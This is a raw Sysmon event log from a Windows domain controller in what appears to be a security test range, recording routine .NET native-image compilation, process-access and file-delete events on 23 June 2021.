23542300x800000000000000019675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.005{4DB9351A-A16B-60D3-F902-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BE3PZ7Z5BN\System.Windows.Forms.ni.dll.auxMD5=21E2E61DF5B7999BB79B1FFBF8C31550,SHA256=02AD47EF0468AA364FCB0146EC901BC3484BE76B6114E115E9E3032D5E449814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:42.988{4DB9351A-A16B-60D3-F902-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BE3PZ7Z5BN\System.Windows.Forms.ni.dllMD5=0AF28C9C7B3718528290583CB29A69D3,SHA256=3D9E7B2CB00D806EA1746CF57D3D6FCED987B1F5496A267D5973681803C68585,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000019704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.988{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.973{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73FBD1C7ABB49C646B90B7087D964E84,SHA256=5A00B2DA611033E8F37808C89420D6EB03913C46FC5DBEB42EE6B09867FCFFBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.973{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.957{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.832{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.832{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FE02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.770{4DB9351A-A174-60D3-FD02-00000000CF01}6992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G0VM3YOYJ3\System.ServiceProcess.ni.dll.auxMD5=7894E3AADBAC65EE6846CB64BAE89E3C,SHA256=CF666E8030F79D92981DF3B9106199DFAC7AF8F96551A54B1CB5C05EC5047436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.770{4DB9351A-A174-60D3-FD02-00000000CF01}6992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G0VM3YOYJ3\System.ServiceProcess.ni.dllMD5=766FB2FAD30D64EEFF95A1B6D7FF704D,SHA256=1433EA260AF380C525C211AD68C016AD9BADB6D5A6146E7A3A7B4C2EF5A057F3,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:44.754{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b50-0\System.ServiceProcess.dll2021-06-23 21:02:44.754 10341000x800000000000000019694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.613{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.598{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.598{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FD02-00000000CF01}6992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.395{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.363{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.363{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A174-60D3-FC02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.301{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18DB98E74A4A4CE6E24AABF5373EAC6C,SHA256=26072A367BDC32FB03311DE5E88A4AB4BBC388A7BF26AEBBA19485BF74EF8B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.285{4DB9351A-A173-60D3-FB02-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BZMUV4VOWQ\System.Runtime.Remoting.ni.dll.auxMD5=7C3A037AA7645B5E5525B827CF6BDDE4,SHA256=66F0C2B98DAFFCEF511FE94D2C83E7FE8311353207252F9C4BD78B213C4FDB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.285{4DB9351A-A173-60D3-FB02-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BZMUV4VOWQ\System.Runtime.Remoting.ni.dllMD5=6E0E147FBBEF471CBF76FAE667A27764,SHA256=EDD5C0D6F11622A5CF38D0FFAF79187E5D7731A29EADC1A07CA36A196796FFEA,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:44.270{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\da4-0\System.Runtime.Remoting.dll2021-06-23 21:02:44.270 10341000x800000000000000019718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.816{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.801{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.801{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0203-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.754{4DB9351A-A175-60D3-0103-00000000CF01}6248NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBGQB10SZG\Accessibility.ni.dll.auxMD5=9F3DEBAE3752FBBE597F14AB5A09E165,SHA256=41DFFFC091EAC9BA651CD3533E87EB659A2324794A014EB11107BFBCDDC713A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.754{4DB9351A-A175-60D3-0103-00000000CF01}6248NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBGQB10SZG\Accessibility.ni.dllMD5=EA568B250B2812F50514B8052FE9470E,SHA256=AEC0E9C8266E2FAF2189A414D108A152E628992A179432E9B0BF854CC6B837E4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:45.738{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1868-0\Accessibility.dll2021-06-23 21:02:45.738 10341000x800000000000000019712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.676{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.660{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.660{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0103-00000000CF01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 